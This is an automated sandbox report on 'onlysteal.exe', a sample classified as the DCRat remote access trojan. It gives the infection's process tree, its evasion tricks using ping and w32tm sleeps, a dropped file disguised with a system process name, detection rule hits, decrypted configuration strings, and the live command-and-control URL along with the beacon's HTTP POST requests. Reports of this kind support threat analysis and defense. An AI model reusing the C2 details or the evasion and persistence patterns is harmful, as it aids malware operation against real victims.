Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
onlysteal.exe

Overview

General Information

Sample name:onlysteal.exe
Analysis ID:1583653
MD5:8f81ac89b9f6dbccf07a86af59faa6ba
SHA1:0d97a27bacaae103f2f15637f623d3d13a568d91
SHA256:766b497466955f86e0d049c25aa6f99880d230acbb8d1141408fe0e8169fb46a
Tags:DCRatexemalwarerattrojanuser-Joker
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Drops PE files with benign system names
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious Program Location with Network Connections
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • onlysteal.exe (PID: 716 cmdline: "C:\Users\user\Desktop\onlysteal.exe" MD5: 8F81AC89B9F6DBCCF07A86AF59FAA6BA)
    • wscript.exe (PID: 6284 cmdline: "C:\Windows\System32\WScript.exe" "C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 5880 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Intorefnet\Te60v9QbFjSF8KEQUR.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • hyperBlockCrtCommon.exe (PID: 2016 cmdline: "C:\Intorefnet/hyperBlockCrtCommon.exe" MD5: 88475FFCF70BAFDA27644064BD214F2A)
          • cmd.exe (PID: 2420 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fmCyxdZe80.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 2268 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 5952 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • SgrmBroker.exe (PID: 7160 cmdline: "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" MD5: 88475FFCF70BAFDA27644064BD214F2A)
              • cmd.exe (PID: 5656 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 2720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • chcp.com (PID: 3300 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                • w32tm.exe (PID: 4156 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                • SgrmBroker.exe (PID: 1488 cmdline: "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" MD5: 88475FFCF70BAFDA27644064BD214F2A)
                  • cmd.exe (PID: 4236 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\szcAPjpm25.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • conhost.exe (PID: 1112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • chcp.com (PID: 6368 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                    • PING.EXE (PID: 4888 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                    • SgrmBroker.exe (PID: 1864 cmdline: "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" MD5: 88475FFCF70BAFDA27644064BD214F2A)
                      • cmd.exe (PID: 3220 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Y6Uf3masa9.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                        • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                        • chcp.com (PID: 6256 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                        • w32tm.exe (PID: 796 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                        • SgrmBroker.exe (PID: 5372 cmdline: "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" MD5: 88475FFCF70BAFDA27644064BD214F2A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://185.216.71.25/PollgeoprocessorprotectbasewordpresswpLocal"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
onlysteal.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      C:\Intorefnet\hyperBlockCrtCommon.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        C:\Intorefnet\hyperBlockCrtCommon.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          C:\ProgramData\smss.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              Click to see the 1 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000005.00000000.2145486370.0000000000C82000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                00000000.00000003.2090139525.0000000006946000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000003.2088603398.000000000604E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000000.00000003.2089878775.000000000694D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: onlysteal.exe PID: 716JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Click to see the 1 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.3.onlysteal.exe.699b6de.1.raw.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          0.3.onlysteal.exe.609c6de.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                            0.3.onlysteal.exe.609c6de.0.raw.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                              5.0.hyperBlockCrtCommon.exe.c80000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                                0.3.onlysteal.exe.699b6de.1.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security

                                  Sigma Signatures

                                  System Summary

                                  barindex
                                  Sigma detected: Execution from Suspicious Folder
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" , CommandLine: "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\fmCyxdZe80.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2420, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe" , ProcessId: 7160, ProcessName: SgrmBroker.exe
                                  Sigma detected: Files With System Process Name In Unsuspected Locations
                                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Intorefnet\hyperBlockCrtCommon.exe, ProcessId: 2016, TargetFilename: C:\Users\All Users\smss.exe
                                  Sigma detected: Suspicious Program Location with Network Connections
                                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 185.216.71.25, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, Initiated: true, ProcessId: 7160, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49746
                                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\onlysteal.exe", ParentImage: C:\Users\user\Desktop\onlysteal.exe, ParentProcessId: 716, ParentProcessName: onlysteal.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbe" , ProcessId: 6284, ProcessName: wscript.exe

                                  Suricata Signatures

                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-03T09:10:33.122779+010020480951A Network Trojan was detected192.168.2.649746185.216.71.2580TCP
                                  2025-01-03T09:11:00.557774+010020480951A Network Trojan was detected192.168.2.649377185.216.71.2580TCP
                                  2025-01-03T09:11:59.621339+010020480951A Network Trojan was detected192.168.2.649431185.216.71.2580TCP

                                  Joe Sandbox Signatures

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Antivirus / Scanner detection for submitted sample
                                  Source: onlysteal.exeAvira: detected
                                  Antivirus detection for dropped file
                                  Source: C:\Users\user\Desktop\BUHwkZnR.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                  Source: C:\Intorefnet\wF0tJ2zNcmafpzDn9Ons.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                  Source: C:\Users\user\Desktop\DYEovgjB.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                  Source: C:\Users\user\Desktop\wYGfctxY.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                  Source: C:\Users\user\Desktop\kzbsFheO.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                  Source: C:\ProgramData\smss.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                  Source: C:\Users\user\Desktop\FPzqkKvM.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                  Source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                  Source: C:\Users\user\Desktop\RpedHXOW.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                  Source: C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Users\user\Desktop\zVMHRGyj.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                  Source: C:\Users\user\Desktop\plugneHL.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                  Source: C:\Users\user\Desktop\AchrHOgY.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                  Source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                  Source: C:\Users\user\AppData\Local\Temp\fmCyxdZe80.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Users\user\AppData\Local\Temp\szcAPjpm25.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Users\user\Desktop\vmGXvtnF.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                  Source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                  Source: C:\Users\user\AppData\Local\Temp\Y6Uf3masa9.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                                  Source: C:\Users\user\AppData\Local\Temp\1dc23k5BXS.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Found malware configuration
                                  Source: 0.3.onlysteal.exe.699b6de.1.unpackMalware Configuration Extractor: DCRat {"C2 url": "http://185.216.71.25/PollgeoprocessorprotectbasewordpresswpLocal"}
                                  Multi AV Scanner detection for dropped file
                                  Source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exeReversingLabs: Detection: 83%
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeReversingLabs: Detection: 83%
                                  Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\IadHSrMxJwYAMPkyRTLDEKgeW.exeReversingLabs: Detection: 83%
                                  Source: C:\ProgramData\smss.exeReversingLabs: Detection: 83%
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeReversingLabs: Detection: 83%
                                  Source: C:\Users\Default\Saved Games\IadHSrMxJwYAMPkyRTLDEKgeW.exeReversingLabs: Detection: 83%
                                  Source: C:\Users\user\Desktop\AchrHOgY.logReversingLabs: Detection: 70%
                                  Source: C:\Users\user\Desktop\BUHwkZnR.logReversingLabs: Detection: 70%
                                  Source: C:\Users\user\Desktop\DYEovgjB.logReversingLabs: Detection: 70%
                                  Source: C:\Users\user\Desktop\FPzqkKvM.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\RpedHXOW.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\kzbsFheO.logReversingLabs: Detection: 70%
                                  Source: C:\Users\user\Desktop\plugneHL.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\vmGXvtnF.logReversingLabs: Detection: 70%
                                  Source: C:\Users\user\Desktop\wYGfctxY.logReversingLabs: Detection: 50%
                                  Source: C:\Users\user\Desktop\zVMHRGyj.logReversingLabs: Detection: 50%
                                  Multi AV Scanner detection for submitted file
                                  Source: onlysteal.exeReversingLabs: Detection: 71%
                                  Source: onlysteal.exeVirustotal: Detection: 76%Perma Link
                                  AI detected suspicious sample
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.7% probability
                                  Machine Learning detection for dropped file
                                  Source: C:\Users\user\Desktop\BUHwkZnR.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\DYEovgjB.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\kzbsFheO.logJoe Sandbox ML: detected
                                  Source: C:\ProgramData\smss.exeJoe Sandbox ML: detected
                                  Source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\AchrHOgY.logJoe Sandbox ML: detected
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeJoe Sandbox ML: detected
                                  Source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\vmGXvtnF.logJoe Sandbox ML: detected
                                  Source: C:\Intorefnet\IadHSrMxJwYAMPkyRTLDEKgeW.exeJoe Sandbox ML: detected
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeJoe Sandbox ML: detected
                                  Machine Learning detection for sample
                                  Source: onlysteal.exeJoe Sandbox ML: detected
                                  Sample uses string decryption to hide its real strings
                                  Source: 00000000.00000003.2088603398.000000000604E000.00000004.00000020.00020000.00000000.sdmpString decryptor: ["XHesibifFlNX29Z91mtItKpO8cNKNjMr11py2gGhWQvddl4J8rUY9gOMcPuFNXRfYggATkHUfMvdYMuXiEMgOyrUndWmwBT88QE7F4zYkA3xuvxPeWhJLvRjyLX0Nehd","ebfe70ca8abacc37de1b3f373e3a32ec899572a7484d84d302662c41dc4d8e50","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                                  Source: 00000000.00000003.2088603398.000000000604E000.00000004.00000020.00020000.00000000.sdmpString decryptor: [["http://185.216.71.25/","PollgeoprocessorprotectbasewordpresswpLocal"]]
                                  Source: onlysteal.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: onlysteal.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: onlysteal.exe
                                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: SgrmBroker.exe, 00000011.00000002.2764836451.000000001BAFB000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: System.pdb source: SgrmBroker.exe, 00000011.00000002.2764836451.000000001BAFB000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbdll source: SgrmBroker.exe, 0000001B.00000002.3343374036.000000000105A000.00000004.00000020.00020000.00000000.sdmp
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0023A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0023A69B
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0024C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0024C220
                                  Source: C:\Users\user\Desktop\onlysteal.exeCode function: 0_2_0025B348 FindFirstFileExA,0_2_0025B348
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile opened: C:\Users\user\AppDataJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile opened: C:\Users\userJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeCode function: 4x nop then jmp 00007FFD3488C906h5_2_00007FFD3488C6ED
                                  Source: C:\Intorefnet\hyperBlockCrtCommon.exeCode function: 4x nop then jmp 00007FFD34A64AA8h5_2_00007FFD34A64540
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 4x nop then jmp 00007FFD348AC906h11_2_00007FFD348AC6ED
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 4x nop then jmp 00007FFD348CC906h17_2_00007FFD348CC6ED
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 4x nop then jmp 00007FFD3489C906h22_2_00007FFD3489C6ED
                                  Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exeCode function: 4x nop then jmp 00007FFD3489C906h27_2_00007FFD3489C6ED

                                  Networking

                                  barindex
                                  Suricata IDS alerts for network traffic
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49746 -> 185.216.71.25:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49377 -> 185.216.71.25:80
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49431 -> 185.216.71.25:80
                                  Uses ping.exe to check the status of other devices and networks
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: global trafficTCP traffic: 192.168.2.6:49369 -> 162.159.36.2:53
                                  Source: Joe Sandbox ViewASN Name: CLOUDCOMPUTINGDE CLOUDCOMPUTINGDE
                                  Source: global trafficHTTP traffic detected: POST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.216.71.25Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.216.71.25Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.216.71.25Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.216.71.25Content-Length: 336Expect: 100-continueConnection: Keep-Alive
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                  Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 185.216.71.25
                                  Source: unknownHTTP traffic detected: POST /PollgeoprocessorprotectbasewordpresswpLocal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.216.71.25Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                                  Source: SgrmBroker.exe, 0000000B.00000002.2481310656.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000011.00000002.2759463627.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000016.00000002.3073228459.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 0000001B.00000002.3344471493.0000000002D63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.216.71.25
                                  Source: SgrmBroker.exe, 0000001B.00000002.3344471493.0000000002D63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.216.71.25/
                                  Source: SgrmBroker.exe, 0000000B.00000002.2481310656.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000011.00000002.2759463627.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000016.00000002.3073228459.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 0000001B.00000002.3344471493.0000000002D63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.216.71.25/PollgeoprocessorprotectbasewordpresswpLocal.php
                                  Source: SgrmBroker.exe, 0000000B.00000002.2481310656.00000000023A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.216.71.25puW
                                  Source: hyperBlockCrtCommon.exe, 00000005.00000002.2165352874.0000000003390000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 0000000B.00000002.2481310656.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000011.00000002.2759463627.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 00000016.00000002.3073228459.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, SgrmBroker.exe, 0000001B.00000002.3344471493.0000000002D63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                                  System Summary

                                  barindex
                                  .NET source code contains very large strings
                                  Source: 0.3.onlysteal.exe.699b6de.1.raw.unpack, s67.csLong String: Length: 97628
                                  Source: 0.3.onlysteal.exe.609c6de.0.raw.unpack, s67.csLong String: Length: 97628
                                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
